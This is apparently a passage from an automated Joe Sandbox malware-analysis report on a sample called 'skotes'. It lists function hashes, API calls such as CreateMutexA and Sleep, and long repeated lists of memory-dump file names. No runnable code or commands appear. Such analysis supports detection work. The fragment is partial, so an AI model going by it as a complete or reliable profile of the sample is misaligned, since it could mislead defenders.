Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 16d7a90384928ecafdfedbead08cfd31b383f326d4a790bcc633e411c95c3370
Instruction ID: ab67ca07f44a9b4ba5ee2c3d5107e7d3fa0bc60524c11440ef45cc9b9063e4b3
Opcode Fuzzy Hash: 16d7a90384928ecafdfedbead08cfd31b383f326d4a790bcc633e411c95c3370
Instruction Fuzzy Hash: 9A317932B801409BEB18DB78DCC9F6DB776EFC6314F288218E4149B7D5CB7999808B52

Function 0094A54D Relevance: 4.6, APIs: 3, Instructions: 132sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0094A550
Sleep.KERNEL32(00000064,?), ref: 0094A963
CreateMutexA.KERNEL32(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 7d6ce14eb96c6e52e12e74c576df69232d8cbcd4eeafedcdd0903e4e0f15ae99
Instruction ID: af4c5fb1a8844bb7759d2e2e842a99a696f6ba23deef273d6a0431e6eb98db4d
Opcode Fuzzy Hash: 7d6ce14eb96c6e52e12e74c576df69232d8cbcd4eeafedcdd0903e4e0f15ae99
Instruction Fuzzy Hash: D0317B326851008FEB18DB78DDC9F6DB766EFC5314F288219F4149B3D1CB3999818B52

Function 0094A682 Relevance: 4.6, APIs: 3, Instructions: 131sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0094A685
Sleep.KERNEL32(00000064,?), ref: 0094A963
CreateMutexA.KERNEL32(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 861fb50568499cc4179e45671290e673c701b4ff274db9c13552148216e1e05f
Instruction ID: 5417f564b3d2c295d66b5f39748437ce2fa44a4ffb324bbd5d6907f6bafc67cf
Opcode Fuzzy Hash: 861fb50568499cc4179e45671290e673c701b4ff274db9c13552148216e1e05f
Instruction Fuzzy Hash: E6314A72A841408BEB18DB78DCC9F6DB776DFC1314F248619E414D77D1C73999818752

Function 0094A7B7 Relevance: 4.6, APIs: 3, Instructions: 130sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0094A7BA
Sleep.KERNEL32(00000064,?), ref: 0094A963
CreateMutexA.KERNEL32(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 509bb2d567ea853fec56fece8c876905d5eeafdd0006ac35fa53a534a15049ec
Instruction ID: d6ab20ff6256231231f2947c130a7392b9ff04bf3c152535b477a613349d013b
Opcode Fuzzy Hash: 509bb2d567ea853fec56fece8c876905d5eeafdd0006ac35fa53a534a15049ec
Instruction Fuzzy Hash: 7C316832A851008FEB18DB78DDC9F6DB776EFC6310F248218E414973D1DB3999818B52

Function 00976E4C Relevance: 3.1, APIs: 2, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0e7fd34e713aa64c01d4f71c79da8f6855650b92490c776518dfe8c0530d93
Instruction ID: 0d3ecd85832af5838333cc7cf881fb33231c6c65068f7d8d5046409dcc3f2e8a
Opcode Fuzzy Hash: 9d0e7fd34e713aa64c01d4f71c79da8f6855650b92490c776518dfe8c0530d93
Instruction Fuzzy Hash: D421D873505504BAEB116BA8DC41B9F7729DF81778F248311F96C2B1C1DB709E059661

Function 0094A960 Relevance: 3.0, APIs: 2, Instructions: 43sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,?), ref: 0094A963
CreateMutexA.KERNEL32(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
